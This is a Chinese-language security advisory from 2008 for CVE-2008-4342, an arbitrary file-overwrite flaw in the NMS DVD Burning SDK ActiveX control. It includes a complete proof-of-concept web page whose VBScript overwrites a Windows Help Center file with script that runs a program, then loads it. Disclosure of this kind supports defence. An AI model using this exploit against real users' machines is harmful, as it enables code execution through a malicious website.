发布日期：2008-09-23
更新日期：2008-09-24

受影响系统：

Numedia Soft NMS DVD Burning SDK 1.013C
Impressum CDBurnerXP Pro 4.2.1.976

描述：

---

BUGTRAQ  ID: 31374
CVE(CAN) ID: CVE-2008-4342

NMS DVD Burning SDK是用于刻录DVD光盘的工具包。

ActiveX版本的NMS DVD Burning SDK所安装的NMSDVDX.DVDEngineX.1（NMSDVDX.dll）控件没有正确地验证对EnableLog()和LogMessage()方式所提供的输入参数，如果用户受骗访问了恶意网站并向上述方式传送了恶意参数的话，就可能覆盖系统上的任意文件。

<*来源：bruiser
  
  链接：http://secunia.com/advisories/31936/
        http://retrogod.altervista.org/9sg_numedia_xpl.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<title> :( </title>
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='DVDEngineX' />
</object>

<script language='vbscript'>
    
    DVDEngineX.Initialize True
    
    sLogFileName="C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm"
    bCreateNew=True
    DVDEngineX.EnableLog sLogFileName ,bCreateNew
    
    nl=unescape("%0d%0a")
    'my garbage ...
    sMsg="<HTML>" & _
         "<SCRIPT LANGUAGE=VBScript>" & nl & _
         "Dim WshShell, oExec" & nl & _
         "Set WshShell = CreateObject(""WScript.Shell"")" & nl & _
         "Set oExec = WshShell.Exec(""calc"")" & nl & _
         "Do While oExec.Status = 0" & nl & _
         "WScript.Sleep 100" & nl & _
         "Loop" & nl & _
         "WScript.Echo oExec.Status" & nl & _
         "<" & Chr(47) & "SCRIPT>" & nl & _
         "<" & Chr(47) & "HTML>"
    DVDEngineX.LogMessage sMsg
    
    window.location = "hcp://system/sysinfo/msinfo.htm"

</script>
</html>

建议：

---

厂商补丁：

Numedia Soft
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nugroovz.com/Default.aspx

浏览次数：2440
严重程度：0（网友投票）